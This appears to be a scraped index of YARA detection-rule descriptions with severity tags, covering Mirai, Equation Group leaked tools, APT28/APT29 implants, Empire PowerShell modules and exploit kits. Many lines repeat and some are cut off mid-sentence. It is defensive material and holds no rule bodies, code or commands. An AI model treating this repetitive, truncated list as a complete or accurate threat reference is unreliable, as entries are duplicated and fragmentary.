Hajime Botnet - MIPS
Hajime Botnet - SH4
yara low
Hajime Botnet - SH4
Detects output generated by EQGRP scanner.exe
Mirai Variant 1
yara low
Mirai Variant 1
Mirai Variant 2
yara low
Mirai Variant 2
Mirai Variant 3
yara low
Mirai Variant 3
Mirai Variant 4
yara low
Mirai Variant 4
Mirai Variant 5
yara low
Mirai Variant 5
Mirai Downloader
yara low
Mirai Downloader
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Detects EquationGroup Tool - April Leak
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool set
yara low
Equation Group hack tool set
Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner
Equation Group hack tool leaked by ShadowBrokers- file calserver
Equation Group hack tool leaked by ShadowBrokers- file cmsd
Equation Group hack tool leaked by ShadowBrokers- file cmsex
Equation Group hack tool leaked by ShadowBrokers- file cryptTool
Equation Group hack tool leaked by ShadowBrokers- file DUL
Equation Group hack tool leaked by ShadowBrokers- file dumppoppy
Equation Group hack tool leaked by ShadowBrokers- file ebbisland
Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5
Equation Group hack tool leaked by ShadowBrokers- file eggbasket
Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0
Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh
Equation Group hack tool leaked by ShadowBrokers- file electricslide
Equation Group hack tool leaked by ShadowBrokers- file elgingamble
Equation Group hack tool leaked by ShadowBrokers- file emptycriss
Equation Group hack tool leaked by ShadowBrokers- file envisioncollision
Equation Group hack tool leaked by ShadowBrokers- file envoytomato
Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1
Equation Group hack tool leaked by ShadowBrokers- file estesfox
Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit
Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1
Equation Group hack tool leaked by ShadowBrokers- file ewok
Equation Group hack tool leaked by ShadowBrokers- file exze
Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7
Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7
Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl
Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86
Equation Group hack tool leaked by ShadowBrokers- file jackpop
Equation Group hack tool leaked by ShadowBrokers- file jparsescan
Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan
Equation Group hack tool leaked by ShadowBrokers- file jscan
Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8
Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py
yara low
Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py
Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py
yara low
Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py
Equation Group hack tool leaked by ShadowBrokers- file packrat
Equation Group hack tool leaked by ShadowBrokers- file parsescan
Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386
Equation Group hack tool leaked by ShadowBrokers- from files pclean.v2.1.1.0-linux-i386, pclean.v2.1.1.0-linux-x86_64
Equation Group hack tool leaked by ShadowBrokers- file porkclient
Equation Group hack tool leaked by ShadowBrokers- file porkserver
Equation Group hack tool leaked by ShadowBrokers- file promptkill
Equation Group hack tool leaked by ShadowBrokers- file ratload
Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script
Equation Group hack tool leaked by ShadowBrokers- file sambal
Equation Group hack tool leaked by ShadowBrokers- file scanner
Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2
Equation Group hack tool leaked by ShadowBrokers- file scripme
Equation Group hack tool leaked by ShadowBrokers- file slugger2
Equation Group hack tool leaked by ShadowBrokers- file smash
Equation Group hack tool leaked by ShadowBrokers- file sshobo
Equation Group hack tool leaked by ShadowBrokers- file telex
Equation Group hack tool leaked by ShadowBrokers- file tnmunger
Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux
Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh
Equation Group hack tool leaked by ShadowBrokers- file xspy
Equation Group hack tool leaked by ShadowBrokers- file ys.auto
The YARA rule '
Rule to detect Moonlight Maze 'cle' log cleaning tool
Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool
Rule to detect Moonlight Maze encrypted keylogger logs
Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers
Rule to detect log cleaners based on utclean.c
Rule to detect log cleaner based on wipe.c
Rule to detect Moonlight Maze 'xk' keylogger
Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */
This YARA rule detects Moonlight Maze Loki malware samples by identifying custom attacker-authored strings associated with the threat group. SOC teams should deploy this rule on endpoint
Rule to detect Moonlight Maze sniffer tools
BlackEnergy / Voodoo Bear Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
Downrage Implant by APT28
yara critical
Downrage Implant by APT28
CozyDuke / CozyCar / CozyBear Implant by APT29
yara critical
CozyDuke / CozyCar / CozyBear Implant by APT29
CozyDuke / CozyCar / CozyBear Implant by APT29
yara critical
CozyDuke / CozyCar / CozyBear Implant by APT29
Mini Duke Implant by APT29
yara critical
Mini Duke Implant by APT29
Cosmic Duke Implant by APT29
yara critical
Cosmic Duke Implant by APT29
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
CORESHELL/SOURFACE Implant by APT28
yara critical
CORESHELL/SOURFACE Implant by APT28
X-Agent/CHOPSTICK Implant by APT28
yara critical
X-Agent/CHOPSTICK Implant by APT28
X-Agent/CHOPSTICK Implant by APT28
yara critical
X-Agent/CHOPSTICK Implant by APT28
X-Agent/CHOPSTICK Implant by APT28
yara critical
X-Agent/CHOPSTICK Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
Detects the BlackEnergy/V
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
Detects the
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
BlackEnergy / Voodoo Bear Implant by APT28
yara critical
BlackEnergy / Voodoo Bear Implant by APT28
XTunnel Implant by APT28
yara critical
XTunnel Implant by APT28
XTunnel Implant by APT28
yara critical
XTunnel Implant by APT28
XTunnel Implant by APT28
yara critical
XTunnel Implant by APT28
XTunnel Implant by APT28
yara critical
XTunnel Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Sednit / EVILTOSS Implant by APT28
yara critical
Sednit / EVILTOSS Implant by APT28
Implant 7 by APT29
yara critical
Implant 7 by APT29
HAMMERTOSS / HammerDuke Implant by APT29
yara critical
HAMMERTOSS / HammerDuke Implant by APT29
HAMMERTOSS / HammerDuke Implant by APT29
yara critical
HAMMERTOSS / HammerDuke Implant by APT29
Onion Duke Implant by APT29
yara critical
Onion Duke Implant by APT29
Unidentified Implant by APT29
yara critical
Unidentified Implant by APT29
Detects Malware from Greenbug Incident
Detects Backdoor from Greenbug Incident
The YARA rule 'Greenbug_Malware_3' detects a backdoor associated with the Greenbug incident, targeting system access and data
Detects ISMDoor Backdoor
yara low
Detects ISMDoor Backdoor
Auto-generated rule - from files 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f, 44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49, 7f16824e7ad9ee1ad2debca2a22413cde08
Detects strings derived from the ShadowBroker's leak of Windows tools/exploits
Auto-generated rule - file HRDG022184_certclint.dll
Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0
yara low
Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0
Mirai Botnet TR-069 Worm - ARM LSB
yara low
Mirai Botnet TR-069 Worm - ARM LSB
Mirai Botnet TR-069 Worm - Generic Architecture
Mirai Botnet TR-069 Worm - MIPS LSB
yara low
Mirai Botnet TR-069 Worm - MIPS LSB
Mirai Botnet TR-069 Worm - MIPS MSB
yara low
Mirai Botnet TR-069 Worm - MIPS MSB
Mirai Botnet TR-069 Worm - PowerPC or Cisco 4500
Mirai Botnet TR-069 Worm - Renesas SH LSB
Mirai Botnet TR-069 Worm - SPARC MSB
yara low
Mirai Botnet TR-069 Worm - SPARC MSB
HackingTeam Android implant, known to detect version v4 - v7
Detects Empire component - from files agent.ps1, agent.ps1
Detects Empire component - file dumpCredStore.ps1
Detects Empire component - file Exploit-JBoss.ps1
Detects Empire component - file Exploit-Jenkins.ps1
Detects Empire component - file Get-GPPPassword.ps1
Detects Empire component - file Get-Keystrokes.ps1
Detects Empire component - file Get-SecurityPackages.ps1
Detects Empire component - file Install-SSP.ps1
Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1
Detects Empire component - file Invoke-DllInjection.ps1
Detects Empire component - file Invoke-EgressCheck.ps1
Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1
Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1
Detects Empire component - file Invoke-MetasploitPayload.ps1
Detects Empire component - file Invoke-Mimikatz.ps1
Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1
Detects Empire component - file Invoke-PostExfil.ps1
Detects Empire component - file Invoke-PowerDump.ps1
Detects Empire component - file Invoke-PsExec.ps1
Detects Empire component - file Invoke-ShellcodeMSIL.ps1
Detects Empire component - file Invoke-SMBAutoBrute.ps1
Detects Empire component - file Invoke-SmbScanner.ps1
Detects Empire component - file Invoke-SSHCommand.ps1
Detects Empire component - file KeePassConfig.ps1
Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1
Detects Empire component - file Out-Minidump.ps1
Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1
Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps
Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1
Detects Empire component - from files Invoke-BypassUAC.ps1, Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DllInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PsEx
Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1
Detects Empire component - from files PowerUp.ps1, PowerUp.ps1
Detects Empire component - file ReflectivePick_x64_orig.dll
Detects Empire component - file PowerUp.ps1
Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195
The YARA rule detects
PassCV Malware mentioned in Cylance Report
PassCV Malware mentioned in Cylance Report
PassCV Malware mentioned in Cylance Report
PassCV Malware mentioned in Cylance Report
PassCV Malware mentioned in Cylance Report
PassCV Malware mentioned in Cylance Report
yara medium
PassCV Malware mentioned in Cylance Report
The PassCV_Sabre_Tool_NTScan rule detects the PassCV malware family, associated with targeted attacks on gaming companies, as
Detects Windows discovery commands - known from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
Detects malware from OilRig Campaign
yara low
Detects malware from OilRig Campaign
keyboy commands
yara low
YARA rule: keyboy_commands
keyboy errors
yara low
YARA rule: keyboy_errors
keyboy init config section
yara low
YARA rule: keyboy_init_config_section
keyboy related exports
yara low
YARA rule: keyboy_related_exports
keyboy systeminfo
yara low
YARA rule: keyboy_systeminfo
new keyboy export
yara low
YARA rule: new_keyboy_export
new keyboy header codes
yara low
YARA rule: new_keyboy_header_codes
EQGRP Toolset Firewall - RC5 / RC6 opcode
EQGRP Toolset Firewall - file BananaAid
EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130
EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100
EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe
EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe
EQGRP Toolset Firewall - file BBANJO-3011.exe
EQGRP Toolset Firewall - file BFLEA-2201.exe
EQGRP Toolset Firewall - file BICECREAM-2140
EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230
EQGRP Toolset Firewall - file bo
yara low
EQGRP Toolset Firewall - file bo
EQGRP Toolset Firewall - file BPATROL-2201.exe
EQGRP Toolset Firewall - file BpfCreator-RHEL4
EQGRP Toolset Firewall - file BPIE-2201.exe
EQGRP Toolset Firewall - file BUSURPER-2211-724.exe
EQGRP Toolset Firewall - file BUSURPER-3001-724.exe
EQGRP Toolset Firewall - Callback addresses
EQGRP Toolset Firewall - file config_jp1_UA.pl
EQGRP Toolset Firewall - file create_dns_injection.py
EQGRP Toolset Firewall - file create_http_injection.py
EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py
yara low
EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py
EQGRP Toolset Firewall - file eligiblecandidate.py
EQGRP Toolset Firewall - file EPBA.script
EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py
EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py
EQGRP Toolset Firewall - Extrabacon exploit output
EQGRP Toolset Firewall - file hexdump.py
EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130
EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130
EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100
EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120
EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130
EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130
EQGRP Toolset Firewall - file jetplow.sh
EQGRP Toolset Firewall - file MixText.py
EQGRP Toolset Firewall - file networkProfiler_orderScans.sh
EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit
EQGRP Toolset Firewall - file payload.py
EQGRP Toolset Firewall - file screamingplow.sh
EQGRP Toolset Firewall - file SecondDate-2211.exe
EQGRP Toolset Firewall - file shellcode.py
EQGRP Toolset Firewall - file sniffer_xml2pcap
EQGRP Toolset Firewall - from files sploit.py, sploit.py
EQGRP Toolset Firewall - file sploit.py
EQGRP Toolset Firewall - from files ssh.py, telnet.py
EQGRP Toolset Firewall - file StoreFc.py
EQGRP Toolset Firewall - from files tinyexec
EQGRP Toolset Firewall - file tinyhttp_setup.sh
EQGRP Toolset Firewall - file tunnel_state_reader
EQGRP Toolset Firewall - file uninstallPBD.bat
EQGRP Toolset Firewall - Unique strings
EQGRP Toolset Firewall - file userscript.FW
EQGRP Toolset Firewall - file workit.py
The YARA rule 'install_get_persistent_filenames
Detects tool from EQGRP toolset - file 1212.pl
Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl
Detects tool from EQGRP toolset - file bc-genpkt
Detects tool from EQGRP toolset - file bc-parser
Detects tool from EQGRP toolset - file dn.1.0.2.1.linux
Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1
The YARA rule 'EQGRP_false' detects
Detects tool from EQGRP toolset - file installdate.pl
Detects tool from EQGRP toolset - file morel.exe
Detects tool from EQGRP toolset - file noclient-3.0.5.3
Detects tool from EQGRP toolset - file teflondoor.exe
Detects tool from EQGRP toolset - file teflonhandle.exe
Detects malware from Project Sauron APT
The YARA rule APT_Project_Sauron_Custom_M2 detects malicious files associated with the Project S
Detects malicious files associated with the Project Sauron APT
Detects malware from Project Sauron APT
Detects malware from Project Sauron APT
The YARA rule 'APT_Project_Sauron_Custom
Detects strings from arping module - Project Sauron report by Kaspersky
Detects strings from basex module - Project Sauron report by Kaspersky
Detects strings from dext module - Project Sauron report by Kaspersky
Detects strings from kblogi module - Project Sauron report by Kaspersky
Detects scripts (mostly LUA) from Project Sauron report by Kaspersky
Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report
Auto-generated rule - from files 370c433dd61ec21d2677cfe02ef93a5f32a2b50d.codex, 5bf48d77bade79f2421ae3d258fe8262c043fb8f.codex, 08bdf374b28b234e824797145206f4df79eac6ea.codex
Auto-generated rule - from files 84b76d765e7357fa5402b5af97d351424a8edf03.codex, d0f90c1b3ebd79a816b5597a49ae8257df697591.codex, da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb.codex
Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex
Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex
Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex
Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex
Detects Furtim Parent Malware
yara low
Detects Furtim Parent Malware
Stuxnet Sample - file dll.dll
yara low
Stuxnet Sample - file dll.dll
Stuxnet Sample - file maindll.decrypted.unpacked.dll_
Stuxnet Sample - file malware.exe
yara low
The YARA rule detects a Stuxnet malware sample named *malware.exe* associated with targeted industrial espionage. SOC teams should deploy this rule in endpoint
Stuxnet Sample - file 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802
Stuxnet Sample - file ~WTR4141.tmp
yara low
Stuxnet Sample - file ~WTR4141.tmp
Stuxnet Sample - file 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198
Stuxnet Sample - file s7hkimdb.dll
yara low
Stuxnet Sample - file s7hkimdb.dll
Stuxnet Sample - file Copy of Shortcut to.lnk
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
The YARA rule 'blackhole2_htm6' detects files associated with the BlackHole2 Exploit Kit, which is used to deliver malware via exploit vectors like malicious HTML or JavaScript.
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
BlackHole2 Exploit Kit Detection
yara low
BlackHole2 Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
The
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
ZeroAccess Exploit Kit Detection
yara low
ZeroAccess Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
Angler Exploit Kit Detection
Angler Exploit Kit Detection
yara low
